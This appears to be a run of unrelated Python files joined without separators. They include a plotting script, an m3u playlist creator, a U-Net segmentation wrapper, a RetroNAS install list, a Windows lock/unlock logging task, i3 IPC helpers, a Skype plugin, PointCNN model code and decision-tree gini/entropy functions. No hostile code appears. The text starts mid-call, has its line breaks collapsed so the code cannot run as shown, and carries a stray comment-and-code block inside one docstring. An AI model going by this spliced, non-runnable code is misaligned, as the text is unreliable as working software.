sharex=True, figsize=(8, 9)) ax[0].plot(iteration, is_total, label='grid by importance sampling') ax[0].plot(iteration, grid_total, label='size of grid') ax[0].legend() ax[0].set_ylabel('number of projections') ax[1].plot(iteration, is_total, label='importance sampling') ax[2].plot(iteration, speedup_total, label='speedup', color='g') ax[2].legend() ax[2].set_xlabel('Iteration: #') ax[2].set_ylabel('speedup factor') fig.suptitle(r'Importance Sampling (Total)') plt.show() if __name__ == '__main__': stdout = sys.argv[1] is_eff(stdout) #For documentation refer to my Github: https://github.com/Zylence/m3u-Playlist-Creation-Script import os from optparse import OptionParser def scanDirectories(): """Scans 'startDirectory' and all subdirectories for all files listed in 'acceptedFormats' and writes them to a dictionary mapping files to a list of paths. """ foundFiles = dict() for root, dirs, files in os.walk(startDirectory): if os.path.split(root)[1] not in excludeDirectories: for file in files: if os.path.splitext(file)[1] in acceptedFormats: foundFiles.setdefault(file, []).append(root) return foundFiles def createPathsHelper(filename, path): """Returns an absolute or relative path according to the'absolutePaths' variable. """ if absolutePaths: return str(path + "/" + filename) else: return str(path.split(startDirectory)[1] + "/" + filename) def createPaths(files): """Takes a dictionary of files mapping to paths. Returns a list of absolute or relative paths with duplicates either removed or not. """ resPaths = [] for filename, paths in files.items(): # paths is a list if removeDuplicates: # discard all but the first path resPaths.append(createPathsHelper(filename, paths[0])) else: # keep all paths for path in paths: resPaths.append(createPathsHelper(filename, path)) return resPaths def writePlaylist(paths): """Writes all the 'paths' into a playlist file named 'fileName' using 'mode' as method of writing. 
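# Reader aid for the option parsing further below: optparse hands back plain
# strings, so "-d False" and "-a False" still evaluate truthy when the script
# later tests removeDuplicates/absolutePaths. Boolean switches are usually
# declared with store_true/store_false so the bare flag flips the default,
# e.g. (illustrative only, not the script's actual interface):
from optparse import OptionParser

_parser = OptionParser()
_parser.add_option("-d", dest="removeDuplicates", action="store_true",
                   default=False,
                   help="keep only the first path found for each duplicate file")
_parser.add_option("-a", dest="absolutePaths", action="store_false",
                   default=True,
                   help="write paths relative to the start directory instead of absolute")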
""" f = open(fileName, mode, encoding=codec) for path in paths: f.write(path + "\n") f.close() if __name__ == "__main__": # args parsing parser = OptionParser() parser.add_option("-n", metavar="fileName", default="playlist.m3u", help="the name of your playlist, use '.m3u' extension") parser.add_option("-m", metavar="mode", default="w", help="mode used for writing, choose 'a' to append, and 'w' to overwrite the playlist file") parser.add_option("-c", metavar="codec", default="utf-8", help="codec used for opening (writing) a file") parser.add_option("-s", metavar="startDirectory", default=os.getcwd(), help="the starting directory for the script to scan for music files, usually your music library") parser.add_option("-e", metavar="excludedDirectories", default="", help="string containing subdirectories separated by whitespaces, e.g.: 'Celtic Classic' will " "not be included in the playlist") parser.add_option("-d", metavar="removeDuplicates", default=False, help="boolean determining whether or not to exclude duplicate files from the playlist") parser.add_option("-a", metavar="absolutePaths", default=True, help="boolean determining whether to use absolute paths") parser.add_option("-f", metavar="acceptedFormats", default=".mp3 .flac .wav .aac", help="string containing file formats separated by whitespaces, e.g.: '.mp3 .flac'") (options, args) = parser.parse_args() # if you prefer hard coding - edit those assignments fileName = options.n mode = options.m codec = options.c startDirectory = options.s excludeDirectories = options.e.split() removeDuplicates = options.d acceptedFormats = options.f.split() absolutePaths = options.a # main script foundFiles = scanDirectories() paths = createPaths(foundFiles) writePlaylist(paths) lazythumbs/tests/__init__.py from lazythumbs.tests.test_server import RenderTest, GetViewTest from lazythumbs.tests.test_templatetag import LazythumbSyntaxTest, LazythumbGeometryCompileTest, LazythumbRenderTest from lazythumbs.tests.test_templatetag import ImgAttrsRenderTest from lazythumbs.tests.test_util import TestGeometry, TestComputeIMG, TestGetImgAttrs, TestGetFormat """ This package contains functionality that is shared among the parts of the Optimal BPM system """jmonsalverodilla/heroku_deploy_iris0 ###################THIS FILE DOES NOT WORK################# import requests import html_to_json #URL = "https://modelo-prueba.herokuapp.com/result" url = "http://127.0.0.1:8080/result" data = {'a':1, 'b':2, 'c':3, 'd':4} ####################Alternativa1############################### r = requests.post(url,data=data) r_json = html_to_json.convert(r.content) print(r_json) prob = r_json['body'][0]['div'][0]['div'][0]['h3'][0]['_value'] print(prob)import torch.nn as nn import segmentation_models_pytorch as smp import torch from torch.cuda.amp import autocast class seg_qyl(nn.Module): def __init__(self, model_name, n_class): super(seg_qyl,self).__init__() self.model = smp.Unet(# UnetPlusPlus encoder_name=model_name, # choose encoder, e.g. mobilenet_v2 or efficientnet-b7 encoder_weights='imagenet', # use `imagenet` pretrained weights for encoder initialization in_channels=3, # model input channels (1 for grayscale images, 3 for RGB, etc.) 
classes=n_class, # model output channels (number of classes in your dataset) decoder_attention_type='se' ) # self.deep_stem_layer = self._make_stem_layer(self.model.encoder.conv1.in_channels, self.model.encoder.conv1.out_channels, # self.model.encoder._norm_layer).to( # torch.device(self.model.encoder.conv1.weight.device)) def _make_stem_layer(self, in_channels, stem_channels, norm_layer): """Make stem layer for ResNet. self.deep_stem:""" return nn.Sequential( nn.Conv2d( in_channels, stem_channels // 2, kernel_size=3, stride=2, padding=1, bias=False), norm_layer(stem_channels // 2), nn.ReLU(inplace=True), nn.Conv2d( stem_channels // 2, stem_channels // 2, kernel_size=3, stride=1, padding=1, bias=False), norm_layer(stem_channels // 2), nn.ReLU(inplace=True), nn.Conv2d( stem_channels // 2, stem_channels, kernel_size=3, stride=1, padding=1, bias=False), norm_layer(stem_channels), nn.ReLU(inplace=True)) @autocast() def forward(self, x): stages = self.model.encoder.get_stages() # stages[1] = self.deep_stem_layer features = [] for i in range(self.model.encoder._depth + 1): x = stages[i](x) features.append(x) # features = self.model.encoder(x) decoder_output = self.model.decoder(*features) masks = self.model.segmentation_head(decoder_output) if self.model.classification_head is not None: labels = self.model.classification_head(features[-1]) return masks, labels return maskscpgames/modules/core/bomberman/modules/__init__.py '''initialize''' from .map import mapParser from .misc import showText, Button, Interface from .sprites import Wall, Background, Fruit, Bomb, Herowebgui/retronas_webgui/data/install_things.py # AUTO-GENERATED: not for manual editing INSTALL_CHOOSER_OPTIONS = [ { "id": "cockpit-web-based-linux-system-manager", "text": "Cockpit web based Linux system manager", "description": None, "commands": "COMMANDS TODO", }, { "id": "etherdfs", "text": "EtherDFS", "description": "lightweight layer 2 network file sharing for DOS", "commands": "COMMANDS TODO", }, { "id": "gogrepo", "text": "gogrepo", "description": "Download your GOG game installers", "commands": "COMMANDS TODO", }, { "id": "lighttpd", "text": "lighttpd", "description": "HTTP/Web server", "commands": "COMMANDS TODO", }, { "id": "microsoft-xbox360-smb-config", "text": "Microsoft XBox360 SMB config", "description": None, "commands": "COMMANDS TODO", }, { "id": "mister-fpga-cifs-config", "text": "MiSTer FPGA CIFS config", "description": None, "commands": "COMMANDS TODO", }, { "id": "netatalk2", "text": "Netatalk2", "description": "AppleTalk and AppleShare file sharing", "commands": "COMMANDS TODO", }, { "id": "netatalk3", "text": "Netatalk3", "description": "Apple AFP file sharing TCP/IP only", "commands": "COMMANDS TODO", }, { "id": "nfs", "text": "NFS", "description": "NFS versions 2, 3 and 4", "commands": "COMMANDS TODO", }, { "id": "nintendo-3ds-qr-code-generator-for-fbi-homebrew", "text": "Nintendo 3DS QR code generator for FBI Homebrew", "description": None, "commands": "COMMANDS TODO", }, { "id": "openssh", "text": "OpenSSH", "description": "SSH/SFTP/SCP Secure Shell command line and file transfer", "commands": "COMMANDS TODO", }, { "id": "proftpd", "text": "ProFTPd", "description": "FTP, File Transfer Protocol file sharing", "commands": "COMMANDS TODO", }, { "id": "rom-import-from-smokemonster-smdbs", "text": "ROM import from Smokemonster SMDBs", "description": None, "commands": "COMMANDS TODO", }, { "id": "samba", "text": "Samba", "description": "LANMan, NTLMv1/v2, NetBIOS, SMB1/2/3, CIFS file sharing", "commands": 
"COMMANDS TODO", }, { "id": "sony-ps2-openps2loader-smb-config", "text": "Sony PS2 OpenPS2Loader SMB config", "description": None, "commands": "COMMANDS TODO", }, { "id": "sony-ps3-ps3netsrv-for-cfw-hen---webman-mod", "text": "Sony PS3 ps3netsrv for CFW/HEN + webMAN-MOD", "description": None, "commands": "COMMANDS TODO", }, { "id": "syncthing-file-sync-tool", "text": "Syncthing file sync tool", "description": None, "commands": "COMMANDS TODO", }, { "id": "telnet", "text": "Telnet", "description": "unencrypted remote access shell", "commands": "COMMANDS TODO", }, { "id": "tftpd-hpa", "text": "tftpd-hpa", "description": "TFTP, Trivial File Transfer Protocol file sharing", "commands": "COMMANDS TODO", }, { "id": "tnfs-for-atari-8-bit-and-zx-spectrum", "text": "TNFS for Atari 8-bit and ZX Spectrum", "description": None, "commands": "COMMANDS TODO", }, { "id": "webone", "text": "WebOne", "description": "HTTP 1.x proxy for a HTTP 2.x world", "commands": "COMMANDS TODO", }, ] 0 # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The ASF licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. import logging.config import os from notification_service.server_config import NotificationServerConfig # We hard code the logging config, we should make it configurable in the future. 
logging.config.dictConfig({ 'version': 1, 'disable_existing_loggers': False, 'formatters': { 'default': { 'format': '[%(asctime)s - %(filename)s:%(lineno)d [%(threadName)s] - %(levelname)s: %(message)s', } }, 'handlers': { 'console': { 'class': 'logging.StreamHandler', 'stream': 'ext://sys.stderr', 'formatter': 'default' } }, 'root': { 'level': 'INFO', 'handlers': ['console'] } }) def get_notification_home(): if 'NOTIFICATION_HOME' in os.environ: home = os.getenv('NOTIFICATION_HOME') else: home = os.getenv('HOME') + '/notification_service' return home NOTIFICATION_HOME = get_notification_home() NOTIFICATION_PID_FILENAME = 'notification_server.pid' def get_configuration_file_path(notification_home=None): if not notification_home: notification_home = NOTIFICATION_HOME config_file_path = notification_home + '/notification_server.yaml' if not os.path.exists(config_file_path): raise FileNotFoundError('Do not find config file {}'.format(config_file_path)) return config_file_path def get_configuration(): config_file_path = get_configuration_file_path() return NotificationServerConfig(config_file=config_file_path) 1-10 import os, fire, json, sys import numpy as np import random as rn import tensorflow as tf sys.path.append(os.getcwd()) from ml_earthquake import collect_data from ml_earthquake import preprocess from ml_earthquake import train def set_random_seed(s): os.environ['PYTHONHASHSEED'] = '0' np.random.seed(s) rn.seed(s) session_conf = tf.ConfigProto( # intra_op_parallelism_threads=1, # inter_op_parallelism_threads=1 ) from keras import backend as K tf.set_random_seed(s) sess = tf.Session(graph=tf.get_default_graph(), config=session_conf) K.set_session(sess) return sess def main( recipe='recipe.json', recipe_id=None, data_dir='data', out_dir='out', work_dir='work', log_dir='log', random_seed=4126): if not os.path.exists(recipe): raise Exception('recipe: {} does not exists...'.format(recipe)) data_path = os.path.join( data_dir, 'earthquakes.csv') if not os.path.exists(data_path): print('collecting earthquake data...') collect_data(data_path) with open(recipe, 'r', encoding='utf-8') as f: recipe_obj = json.load(f) sess = None for r in recipe_obj['recipe']: if recipe_id is not None and recipe_id != r['id']: continue if sess is not None: sess.close() tf.reset_default_graph() sess = set_random_seed(random_seed) print('start preprocess and train for recipe ID: {}'.format(r['id'])) X_train, y_train, X_test, y_test, info_train, info_test = preprocess( data_path, r['window_days'], r['predict_range_days'], r['lat_granularity'], r['lng_granularity'], r['predict_center_lat'], r['predict_center_lng'], r['predict_radius_meters'], r['threshold_mag'], cache_dir=work_dir ) train( X_train, y_train, X_test, y_test, info_train=info_train, info_test=info_test, out_dir=os.path.join(out_dir, r['id']), log_dir=log_dir, learning_rate=r['learning_rate'] if 'learning_rate' in r else 5e-6, decay=r['decay'] if 'decay' in r else 0.0, epochs=r['epochs'], dropout=r['dropout'], random_state=random_seed, resampling_methods=r['resampling_methods'] if 'resampling_methods' in r else None, balanced_batch=r['balanced_batch'] if 'balanced_batch' in r else None ) if __name__ == '__main__': fire.Fire(main) snownlp/seg/seg.py # -*- coding: utf-8 -*- from __future__ import print_function from __future__ import unicode_literals import codecs from ..utils.tnt import TnT from .y09_2047 import CharacterBasedGenerativeModel class Seg(object): def __init__(self, name='other'): if name == 'tnt': self.segger = TnT() else: self.segger = 
CharacterBasedGenerativeModel() def save(self, fname, iszip=True): self.segger.save(fname, iszip) def load(self, fname, iszip=True): self.segger.load(fname, iszip) def train(self, fname): fr = codecs.open(fname, 'r', 'utf-8') data = [] for i in fr: line = i.strip() if not line: continue tmp = map(lambda x: x.split('/'), line.split()) data.append(tmp) fr.close() self.segger.train(data) def seg(self, sentence): ret = self.segger.tag(sentence) tmp = '' for i in ret: if i[1] == 'e': yield tmp+i[0] tmp = '' elif i[1] == 'b' or i[1] == 's': if tmp: yield tmp tmp = i[0] else: tmp += i[0] if tmp: yield tmp if __name__ == '__main__': seg = Seg() seg.train('data.txt') print(' '.join(seg.seg('主要是用来放置一些简单快速的中文分词和词性标注的程序'))) 1-10 import win32com.client import os def register_task(scheduler, state_change, name, command, arguments): folder = scheduler.GetFolder('\\') definition = scheduler.NewTask(0) TASK_TRIGGER_SESSION_STATE_CHANGE = 11 trigger = definition.Triggers.Create(TASK_TRIGGER_SESSION_STATE_CHANGE) trigger.StateChange = state_change TASK_ACTION_EXEC = 0 action = definition.Actions.Create(TASK_ACTION_EXEC) action.Path = command action.Arguments = arguments TASK_CREATE_OR_UPDATE = 6 TASK_LOGON_NONE = 0 NO_USER = '' NO_PASSWORD = '' folder.RegisterTaskDefinition(name, definition, TASK_CREATE_OR_UPDATE, NO_USER, NO_PASSWORD, TASK_LOGON_NONE) script = os.path.abspath('..\log.py') scheduler = win32com.client.Dispatch('Schedule.Service') scheduler.Connect() TASK_SESSION_LOCK = 7 TASK_SESSION_UNLOCK = 8 register_task(scheduler, TASK_SESSION_LOCK, 'Lock Logging', 'C:\\Windows\\pyw.exe' , script + ' lock') register_task(scheduler, TASK_SESSION_UNLOCK, 'Unlock Logging', 'C:\\Windows\\pyw.exe' , script + ' unlock') 10-100 import sys try: import cPickle as pickle except: import pickle import numpy as np class SignedDensityField(object): """ Data is stored in the following way data[x, y, z] """ def __init__(self, data, origin, delta): self.data = data self.nx, self.ny, self.nz = data.shape self.origin = origin self.delta = delta self.max_coords = self.origin + delta * np.array(data.shape) def _rel_pos_to_idxes(self, rel_pos): i_min = np.array([0, 0, 0], dtype=np.int) i_max = np.array([self.nx - 1, self.ny - 1, self.nz - 1], dtype=np.int) return np.clip(((rel_pos - self.origin) / self.delta).astype(int), i_min, i_max) def get_distance(self, rel_pos): rel_pos = np.reshape(rel_pos, (-1, 3)) idxes = self._rel_pos_to_idxes(rel_pos) assert idxes.shape[0] == rel_pos.shape[0] return self.data[idxes[:, 0], idxes[:, 1], idxes[:, 2]] def dump(self, pkl_file): data = {} data['data'] = self.data data['origin'] = self.origin data['delta'] = self.delta with open(pkl_file, 'wb') as file: pickle.dump(data, file, protocol=2) def visualize(self, max_dist=0.1): try: from mayavi import mlab except: raise Exception("mayavi is not installed!") figure = mlab.figure('Signed Density Field') SCALE = 100 # The dimensions will be expressed in cm for better visualization. 
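        # (added) the lines below clip distances to 'max_dist' so far-away free
        # space does not wash out the volume rendering, then offset and negate the
        # field so that points inside the object (negative signed distance) end up
        # with the largest values.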
data = np.copy(self.data) data = np.minimum(max_dist, data) xmin, ymin, zmin = SCALE * self.origin xmax, ymax, zmax = SCALE * self.max_coords delta = SCALE * self.delta xi, yi, zi = np.mgrid[xmin:xmax:delta, ymin:ymax:delta, zmin:zmax:delta] data[data <= 0] -= 0.2 data = -data grid = mlab.pipeline.scalar_field(xi, yi, zi, data) vmin = np.min(data) vmax = np.max(data) mlab.pipeline.volume(grid, vmin=vmin, vmax=(vmax + vmin) / 2) mlab.axes() mlab.show() @classmethod def from_sdf(cls, sdf_file): with open(sdf_file, 'r') as file: axis = 2 lines = file.readlines() nx, ny, nz = map(int, lines[0].split(' ')) x0, y0, z0 = map(float, lines[1].split(' ')) delta = float(lines[2].strip()) data = np.zeros([nx, ny, nz]) for i, line in enumerate(lines[3:]): idx = i % nx idy = int(i / nx) % ny idz = int(i / (nx * ny)) val = float(line.strip()) data[idx, idy, idz] = val return cls(data, np.array([x0, y0, z0]), delta) @classmethod def from_pkl(cls, pkl_file): with open(pkl_file, 'rb') as file: if sys.version_info >= (3, 0): data = pickle.load(file, encoding='bytes', fix_imports=True) else: data = pickle.load(file) return cls(data[b'data'], data[b'origin'], data[b'delta']) 10-100 """Inter Process Communication functionality.""" import logging import subprocess from pathlib import Path log = logging.getLogger(__name__) def configure(cnf=None, deactivate=False): if deactivate: I3.configure(None) I3bar.configure(None) Notify.configure(None) log.info("ipc deactivated") else: I3.configure(cnf.payload["main"]["i3_refresh_msg"]) log.info(f"set i3 refresh method to {I3.refresh.__name__}") I3bar.configure(cnf.payload["main"]["status_command"]) log.info(f"set i3bar refresh method to {I3bar.refresh.__name__}") Notify.configure(cnf.payload["main"]["notify"]) log.info(f"set notify method to {Notify.send.__name__}") def communicate(msg="new config active", refresh=False, urgency="low"): if refresh: I3.refresh() I3bar.refresh() Notify.send(msg, urgency=urgency) class I3: @classmethod def configure(cls, which): cls.refresh = cls.METHOD_MAP.get(which, nop) @classmethod def reload_i3(cls): cls._send_i3_msg("reload") @classmethod def restart_i3(cls): subprocess.call(["i3-msg", "restart"]) refresh = restart_i3 METHOD_MAP = {"restart": restart_i3, "reload": reload_i3} @classmethod def _send_i3_msg(cls, msg): try: output = subprocess.check_output(["i3-msg", msg]).decode() if '"success":true' in output: return True return False except subprocess.CalledProcessError as e: if msg == "restart" and e.returncode == 1: log.debug("[IGNORE] exit 1 is ok for restart") return True @classmethod def get_config_error_report(cls, path): cmd = ["i3", "-C", "-c", str(path)] try: return subprocess.check_output(cmd).decode() except subprocess.CalledProcessError as e: return e.output.decode() except FileNotFoundError as e: assert Path(path).exists(), path assert "No such file or directory: 'i3'" in e.strerror log.warning("[IGNORE] crashed - no i3 -> assuming test system") return "" class Notify: @classmethod def configure(cls, notify): cls.send = cls.notify_send if notify else nop @classmethod def notify_send(cls, msg, urgency="low"): """urgency levels: low, normal, critical""" subprocess.check_call( ["notify-send", "-a", "i3configger", "-t", "1", "-u", urgency, msg] ) send = notify_send class I3bar: command = "i3status" @classmethod def configure(cls, command): cls.command = command cls.refresh = cls.refresh if command else nop @classmethod def send_sigusr1(cls): try: subprocess.check_output(["killall", "-SIGUSR1", cls.command]) except 
subprocess.CalledProcessError as e:
            log.debug("[IGNORE] failed status refresh: %s", e)

    refresh = send_sigusr1


def nop(*args, **kwargs):
    log.debug(f"just ignored everything to do with {args} and {kwargs}")
Skype/__init__.py
import eg

eg.RegisterPlugin(
    name = "Skype",
    author = " ()",
    version = "0.0.1",
    kind = "program",
    guid = "{950A9379-87D1-4981-99DF-AB727D53A0EB}",
    url = "https://github.com/OrbitalDan/EventghostSkypePlugin",
    description = (
        'Adds events and actions to interact with
Skype.' ), ) # TODO: Add icon like so: #icon = ( # "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAACDElEQVR42pWTT0gUcRTH" # "" # "" # "//" # "NpsleidES8NL1I6rkBzj8tAXYyhVkLcJuGHTNNEfRPmR1ghfOwo1p2B2hO7HefP+m8Jh" # "290sE3DDtuXdZIjwuVXE2gNwpAuexdCeVxMZ+5xw10Rww+l0Wn14t4vOEx+Q5CY7ah0U" # "bJc1D+Z3Ae1ehs7oOLIsl0QEd2RNs597+iPkFsH6DScvwNfX9nkZMnNMr/yCtkcoilIq" # "7HaBphFY+Qmt3TY4D1Mz4PXAnjUGJ/Io4VkkSdoU2JpCIHCG+HAP0twU5D/BoSrMhW9o" # "SZGWKwOoqlqCnRTcRTSMFLF+P1L6KeyznKh60iJXf5HeW2FEUSyDy37B690fm7zdHpSs" # "t3Cwiuz8IlGjEX/PgJOzu6Hcre1sfHU1kXj0fFiyUlBcRRtdYm9bHzdCNzd7vgJcEuho" # "rn01er1eMYwFQk/MaV/zJaVSK1caKuei/Vh1XG7wKP0vLM0+Dv5jmCpOo2/DZv93nP8A" # "opkfXpsJ2wUAAAAASUVORK5CYII=" #), from threading import Event, Thread import win32com.client import pythoncom # Event handler object to relay events back to main plugin class class SkypeCallStatusHandler(object): def SetPluginParent(self,parent): self.parent = parent def SetSkypeClient(self,skype): self.skype = skype def OnCallStatus(self, theCall, callStatus): self.parent.SetStatus(self.skype.Convert.CallStatusToText(callStatus)) #End SkypeCallStatusHandler class Skype(eg.PluginBase): #--- Lifecycle Management ----------------------------------------- def __init__(self): self.status = "" print "Skype Plugin is initialized." def __start__(self): self.stopThreadEvent = Event() thread = Thread( target=self.ThreadLoop, args=(self.stopThreadEvent, ) ) thread.start() print "Skype Plugin is started." def __stop__(self): self.stopThreadEvent.set() print "Skype Plugin is stopped." def __close__(self): print "Skype Plugin is closed." #--- External COM Thread ------------------------------------------ def ThreadLoop(self, stopThreadEvent): pythoncom.CoInitialize() skype = win32com.client.Dispatch("Skype4COM.Skype") skype.Attach() handler = win32com.client.WithEvents(skype, SkypeCallStatusHandler) handler.SetSkypeClient(skype) handler.SetPluginParent(self) while not stopThreadEvent.isSet(): pythoncom.PumpWaitingMessages() stopThreadEvent.wait(1.0) def SetStatus(self, status): if ( self.status != status ): self.status = status self.TriggerEvent(status) #------------------------------------------------------------------ #End Skype Pluginmodels/frustum_pointcnn.py ''' Frustum PointNets v2 Model. ''' from __future__ import print_function import sys import os import tensorflow as tf import numpy as np import importlib BASE_DIR = os.path.dirname(os.path.abspath(__file__)) ROOT_DIR = os.path.dirname(BASE_DIR) sys.path.append(BASE_DIR) sys.path.append(os.path.join(ROOT_DIR, 'utils')) import tf_util from pointnet_util import pointnet_sa_module, pointnet_sa_module_msg, pointnet_fp_module from model_util import NUM_HEADING_BIN, NUM_SIZE_CLUSTER, NUM_OBJECT_POINT from model_util import point_cloud_masking, get_center_regression_net from model_util import placeholder_inputs, parse_output_to_tensors, get_loss pointcnn_setting_path = os.path.join(os.path.dirname(__file__), 'pointcnn') sys.path.append(pointcnn_setting_path) from pointcnn import PointCNN from pointcnn_seg import PointCNNSegNet from pointcnn_box_estimate import PointCNNBoxNet def get_instance_seg_v2_net(point_cloud, one_hot_vec, is_training, bn_decay, end_points): ''' 3D instance segmentation PointNet v2 network. 
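    (Note: in this file the segmentation backbone is built with PointCNN via
    PointCNNSegNet below; the "PointNet v2" wording is kept from the original
    Frustum PointNets code.)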
Input: point_cloud: TF tensor in shape (B,N,4) frustum point clouds with XYZ and intensity in point channels XYZs are in frustum coordinate one_hot_vec: TF tensor in shape (B,3) length-3 vectors indicating predicted object type is_training: TF boolean scalar bn_decay: TF float scalar end_points: dict Output: logits: TF tensor in shape (B,N,2), scores for bkg/clutter and object end_points: dict ''' setting = importlib.import_module('segmentation') xyz = tf.slice(point_cloud, [0,0,0], [-1,-1,3]) features = tf.slice(point_cloud, [0,0,3], [-1,-1,1]) # (B, 3) -> (B, N, 3) feat_one_hot = tf.tile(tf.expand_dims(one_hot_vec, 1), [1, point_cloud.get_shape()[1], 1]) features = tf.concat([features, feat_one_hot], 2) seg_net = PointCNNSegNet(xyz, features, is_training, setting) output = seg_net.output # end_points['feats']? return output, end_points def get_3d_box_estimation_v2_net(object_point_cloud, one_hot_vec, is_training, bn_decay, end_points): ''' 3D Box Estimation PointNet v2 network. Input: object_point_cloud: TF tensor in shape (B,M,C) masked point clouds in object coordinate one_hot_vec: TF tensor in shape (B,3) length-3 vectors indicating predicted object type Output: output: TF tensor in shape (B,3+NUM_HEADING_BIN*2+NUM_SIZE_CLUSTER*4) including box centers, heading bin class scores and residuals, and size cluster scores and residuals ''' setting = importlib.import_module('box_estimate') features = tf.tile(tf.expand_dims(one_hot_vec, 1), [1, object_point_cloud.get_shape()[1], 1]) box_net = PointCNNBoxNet(object_point_cloud, features, is_training, setting) output = box_net.output return output, end_points def get_model(point_cloud, one_hot_vec, is_training, bn_decay=None): ''' Frustum PointNets model. The model predict 3D object masks and amodel bounding boxes for objects in frustum point clouds. 
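    A minimal call, mirroring the __main__ block at the bottom of this file:

        end_points = get_model(tf.zeros((32, 1024, 4)), tf.ones((32, 3)),
                               tf.constant(True))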
Input: point_cloud: TF tensor in shape (B,N,4) frustum point clouds with XYZ and intensity in point channels XYZs are in frustum coordinate one_hot_vec: TF tensor in shape (B,3) length-3 vectors indicating predicted object type is_training: TF boolean scalar bn_decay: TF float scalar Output: end_points: dict (map from name strings to TF tensors) ''' end_points = {} # 3D Instance Segmentation PointNet logits, end_points = get_instance_seg_v2_net(\ point_cloud, one_hot_vec, is_training, bn_decay, end_points) end_points['mask_logits'] = logits # Masking # select masked points and translate to masked points' centroid object_point_cloud_xyz, mask_xyz_mean, end_points = \ point_cloud_masking(point_cloud, logits, end_points) # T-Net and coordinate translation center_delta, end_points = get_center_regression_net(\ object_point_cloud_xyz, one_hot_vec, is_training, bn_decay, end_points) stage1_center = center_delta + mask_xyz_mean # Bx3 end_points['stage1_center'] = stage1_center # Get object point cloud in object coordinate object_point_cloud_xyz_new = \ object_point_cloud_xyz - tf.expand_dims(center_delta, 1) # Amodel Box Estimation PointNet output, end_points = get_3d_box_estimation_v2_net(\ object_point_cloud_xyz_new, one_hot_vec, is_training, bn_decay, end_points) # Parse output to 3D box parameters end_points = parse_output_to_tensors(output, end_points) end_points['center'] = end_points['center_boxnet'] + stage1_center # Bx3 return end_points if __name__=='__main__': with tf.Graph().as_default(): inputs = tf.zeros((32,1024,4)) outputs = get_model(inputs, tf.ones((32,3)), tf.constant(True)) for key in outputs: print((key, outputs[key])) loss = get_loss(tf.zeros((32,1024),dtype=tf.int32), tf.zeros((32,3)), tf.zeros((32,),dtype=tf.int32), tf.zeros((32,)), tf.zeros((32,),dtype=tf.int32), tf.zeros((32,3)), outputs) print(loss) import math from itertools import combinations import numpy as np import pandas as pd from tabulate import tabulate def load_dataset(filename: str): df = pd.read_csv(filename, header=None) global dataset_size dataset_size = df.shape[0] print(tabulate([['Dataset Size', dataset_size], ['# of Attributes', df.shape[1] - 1]], tablefmt='grid', headers=['Dataset Summary', filename])) return df def entropy(dataset: pd.DataFrame, class_label_column): entropy_node = 0 values = dataset[class_label_column].unique() for val in values: # print(val, dataset[class_label_column].value_counts()[val]) p_i = dataset[class_label_column].value_counts()[val] / len(dataset[class_label_column]) entropy_node += (-p_i * np.log2(p_i)) return entropy_node def entropy_attribute(dataset: pd.DataFrame, class_label_column, attribute): entropy_attr = 0 attr_vars = dataset[attribute].unique() for val in attr_vars: # print('\nAj =', val) df_attr = dataset[dataset[attribute] == val] # print(df_attr) info = entropy(df_attr, class_label_column) # print('Info(Dj) =', info) # print('Dj :', df_attr.shape[0], 'D :', dataset_size) fraction = df_attr.shape[0] / dataset_size # print('Dj / D = ', fraction) entropy_attr += (fraction * info) return entropy_attr def entropy_attribute_cont(dataset: pd.DataFrame, class_label_column, attribute): attr_col = dataset[attribute].sort_values() min_entropy = float('inf') split_pt = 0 # print(len(attr_col.unique())) for i in range(len(attr_col) - 1): if attr_col.iloc[i] == attr_col.iloc[i + 1]: continue mid_pt = (attr_col.iloc[i] + attr_col.iloc[i + 1]) / 2 d1 = dataset[dataset[attribute] <= mid_pt] d2 = dataset[dataset[attribute] > mid_pt] e1 = entropy(d1, class_label_column) e2 = 
entropy(d2, class_label_column) _entropy = ((d1.shape[0] / dataset_size) * e1) + ((d2.shape[0] / dataset_size) * e2) if _entropy < min_entropy: min_entropy = _entropy split_pt = mid_pt return min_entropy, split_pt def gain(dataset: pd.DataFrame, class_label_column, attribute): _gain = entropy(dataset, class_label_column) - entropy_attribute(dataset, class_label_column, attribute) return _gain def gini(dataset: pd.DataFrame, class_label_column): labels = dataset[class_label_column].unique() list_pi = list() for val in labels: # print(val, dataset[class_label_column].value_counts()[val]) p_i = dataset[class_label_column].value_counts()[val] / len(dataset[class_label_column]) list_pi.append(p_i ** 2) _gini = 1 - sum(list_pi) return _gini def gini_attribute(dataset: pd.DataFrame, class_label_column, attribute): attr_vals = dataset[attribute].unique() # print(attr_vals) min_gini = float('inf') splitting_attr = list() for r in range(1, math.floor(len(attr_vals) / 2) + 1): comb_list = list(combinations(attr_vals, r)) for subset in comb_list: d1 = set(attr_vals) - set(subset) d2 = set(subset) # print('D1 :', d1, 'D2 :', d2) g1 = dataset[dataset[attribute].isin(d1)] g2 = dataset[dataset[attribute].isin(d2)] # print('G1 :', g1.shape[0], 'g2 :', g2.shape[0]) G1 = gini(g1, class_label_column) G2 = gini(g2, class_label_column) # print('GINI - 1 :', G1, 'GINI - 2 :', G2) _gini_attr = ((g1.shape[0] / dataset_size) * G1) + ((g2.shape[0] / dataset_size) * G2) # print('GINI_ATTR :', _gini_attr) if _gini_attr <= min_gini: min_gini = _gini_attr splitting_attr = [d1, d2] # print('MAX GINI:', mx_gini) # print(splitting_attr, '\n') return min_gini, splitting_attr def gini_cont(dataset: pd.DataFrame, class_label_column, attribute): attr_col = dataset[attribute].sort_values() min_gini = float('inf') split_pt = 0 # print(attr_col) for i in range(len(attr_col) - 1): if attr_col.iloc[i] == attr_col.iloc[i + 1]: continue mid_pt = (attr_col.iloc[i] + attr_col.iloc[i + 1]) / 2 d1 = dataset[dataset[attribute] <= mid_pt] d2 = dataset[dataset[attribute] > mid_pt] g1 = gini(d1, class_label_column) g2 = gini(d2, class_label_column) _gini = ((d1.shape[0] / dataset_size) * g1) + ((d2.shape[0] / dataset_size) * g2) if _gini < min_gini: min_gini = _gini split_pt = mid_pt return min_gini, split_pt if __name__ == '__main__': data = load_dataset('Dataset/Iris/iris.data') print(gini(data, class_label_column=4)) print() # spl_attr, 